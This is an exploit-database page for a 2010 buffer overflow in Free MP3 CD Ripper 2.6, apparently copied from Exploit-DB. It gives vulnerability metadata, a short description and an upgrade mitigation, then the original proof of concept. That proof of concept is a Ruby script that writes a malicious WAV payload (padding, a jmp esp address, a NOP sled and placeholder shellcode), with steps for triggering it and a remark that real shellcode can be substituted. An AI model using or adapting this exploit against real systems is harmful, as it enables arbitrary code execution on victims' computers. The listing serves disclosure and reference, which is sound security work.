Free MP3 CD Ripper 2.6 (wav) 0-day

vendor:

Free MP3 CD Ripper

by:

Richard Leahy

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Free MP3 CD Ripper

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: YES

Related CWE: N/A

CPE: a:free_mp3_cd_ripper:free_mp3_cd_ripper

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2010

Free MP3 CD Ripper 2.6 (wav) 0-day

A buffer overflow vulnerability exists in Free MP3 CD Ripper 2.6 when a specially crafted WAV file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to insufficient boundary checks when processing WAV files. By sending a specially crafted WAV file, an attacker can cause a buffer overflow, which can be used to execute arbitrary code.

Mitigation:

Upgrade to the latest version of Free MP3 CD Ripper.

Source

Exploit-DB raw data:

# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day
# Date: 30/03/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2

#to exploit this  open up the application select file -> wav converter -> wav to mp3

#use your favourite programming language and print out the contents into a text file. save the text #file as a .wav
#then open up the wav file and boom.

#feel free to email me leahy_rich@hotmail.com

#code

!#/usr/bin/env ruby
nop = "\x90" # nop
shellcode = "\xCC" #just an interupt can be replaced by proper shellcode
jmp_esp = "\x32\xfa\xca\x76" #find a jmp esp i will use imagehlp  , little endian so reverse it
boom = "A" * 4112 + jmp_esp + nop * 50 + shellcode

puts boom